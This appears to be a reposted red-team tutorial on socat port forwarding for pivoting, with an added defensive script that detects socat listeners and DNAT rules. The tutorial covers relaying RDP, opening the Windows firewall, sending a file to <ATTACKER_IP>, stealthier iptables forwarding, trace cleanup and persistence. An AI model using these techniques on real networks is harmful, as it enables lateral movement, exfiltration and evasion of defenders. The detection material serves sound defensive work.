Port Forwarding With socat: A Red Team Guide


When SSH isn’t an option, socat (Socket Cat) becomes a powerful alternative for port forwarding and pivoting in Red Team operations. Below is a deep dive into its usage, along with practical commands and scenarios.

Why Use socat?

  • SSH is blocked: socat doesn’t rely on SSH.
  • Lightweight: Simple syntax, no complex setup.
  • Persistent connections: The `fork` option spawns a child process per client, so the listener keeps accepting new connections instead of exiting after the first one.
  • Flexible: Can forward TCP/UDP ports bidirectionally.

Basic socat Command

To forward port `1234` on a host to 1.1.1.1:4321:

socat TCP4-LISTEN:1234,fork TCP4:1.1.1.1:4321

  • `TCP4-LISTEN:1234`: Listens on port 1234.
  • `fork`: Allows multiple connections.

Pivoting RDP with socat

If you need to access a target’s RDP (port 3389) via an intermediate machine (PC-1):

socat TCP4-LISTEN:3389,fork TCP4:3.3.3.3:3389

Now, connect to `PC-1:3389` to reach the target RDP service.

Bypassing Windows Firewall

If Windows Firewall blocks the listener:

netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389

Exposing Attacker’s Port to the Target

To allow the target to connect back to your attack machine (1.1.1.1:80):

socat TCP4-LISTEN:80,fork TCP4:1.1.1.1:80

Secure the Tunnel User (Linux)

Prevent shell access for the tunneling user:

useradd tunneluser -m -d /home/tunneluser -s /bin/true
passwd tunneluser

You Should Know:

  • File Transfer via socat:
    On the receiver:
    socat TCP4-LISTEN:4444,fork OPEN:received_file,creat
    On the sender:
    socat TCP4:<ATTACKER_IP>:4444 OPEN:file_to_send

  • UDP Forwarding:
    socat UDP4-LISTEN:53,fork UDP4:8.8.8.8:53

  • Encrypted Tunneling (SSL):
    socat OPENSSL-LISTEN:443,cert=cert.pem,verify=0,fork TCP4:localhost:80
    (`verify=0` disables peer-certificate checking, so any client that can reach the port can use the tunnel.)

What Undercode Says

While socat is a powerful fallback when SSH is unavailable, it leaves forensic traces (dropped binaries, open ports). Always:
– Clean up listeners: `killall socat`
– Check for artifacts:

netstat -tulnp | grep socat
lsof -i :3389

– Use iptables/nftables for stealthier forwarding:

iptables -t nat -A PREROUTING -p tcp --dport 1234 -j DNAT --to-destination 1.1.1.1:4321
iptables -t nat -A POSTROUTING -j MASQUERADE

For persistence, consider systemd services or cron jobs, but OpSec is key.
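The artifact checks above (looking for socat in the socket table) and the iptables DNAT rules are exactly what a blue team audits for on a suspected pivot host. The following script is an added example written for this guide, not code from the original post: it parses `ss -tulnp` output for listening sockets owned by socat and `iptables-save` output for DNAT rules in the nat table. The `ss` and `iptables-save` sample lines embedded in it are constructed, and the `--live` flag is this script's own convention.

```shell
#!/bin/sh
# Added example (not from the original post): audit a Linux host for the two
# forwarding artifacts the post names: socat listeners and iptables DNAT rules.

# find_socat_listeners: read `ss -tulnp` output on stdin and print one line
# per listening/bound socket owned by a socat process: "<proto> <local> <pid>".
# If several socat processes share a socket (fork children), the first pid wins.
find_socat_listeners() {
    awk '
        NR > 1 && $1 ~ /^(tcp|udp)$/ && $NF ~ /"socat"/ {
            # last column looks like: users:(("socat",pid=4242,fd=5))
            pid = $NF
            sub(/.*pid=/, "", pid); sub(/,.*/, "", pid)
            print $1, $5, pid
        }'
}

# find_dnat_rules: read `iptables-save` output on stdin and print one line per
# DNAT rule in the nat table: "<chain> <dport> <to-destination>".
find_dnat_rules() {
    awk '
        /^\*/ { table = substr($1, 2) }            # "*nat" -> "nat"
        table == "nat" && $1 == "-A" && /-j DNAT/ {
            chain = $2; dport = "-"; dest = "-"
            for (i = 1; i <= NF; i++) {
                if ($i == "--dport") dport = $(i + 1)
                if ($i == "--to-destination") dest = $(i + 1)
            }
            print chain, dport, dest
        }'
}

# Constructed sample of `ss -tulnp` output (sshd plus a TCP and a UDP socat).
sample_ss() {
cat <<'EOF'
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
tcp   LISTEN 0      128          0.0.0.0:22        0.0.0.0:*     users:(("sshd",pid=812,fd=3))
tcp   LISTEN 0      5            0.0.0.0:1234      0.0.0.0:*     users:(("socat",pid=4242,fd=5))
udp   UNCONN 0      0            0.0.0.0:53        0.0.0.0:*     users:(("socat",pid=4250,fd=5))
EOF
}

# Constructed sample of `iptables-save` output containing the post's DNAT rule.
sample_iptables() {
cat <<'EOF'
*filter
:INPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
COMMIT
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p tcp -m tcp --dport 1234 -j DNAT --to-destination 1.1.1.1:4321
-A POSTROUTING -j MASQUERADE
COMMIT
EOF
}

if [ "${1:-}" = "--live" ]; then
    # Run against the real host (needs root for process names and the nat table).
    ss -tulnp 2>/dev/null | find_socat_listeners
    iptables-save 2>/dev/null | find_dnat_rules
else
    echo "== socat sockets (constructed sample) =="
    sample_ss | find_socat_listeners
    echo "== DNAT rules in nat table (constructed sample) =="
    sample_iptables | find_dnat_rules
fi
```

Run it with `--live` on a host under review, or without arguments to see it work on the embedded samples. Both parsers only read text, so the same functions can be pointed at `ss` and `iptables-save` output collected during incident response.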

Expected Output:

A functional port forward with minimal detection risk. Use socat sparingly—prefer SSH when possible.

Reported By: Iram Jack – Hackers Feeds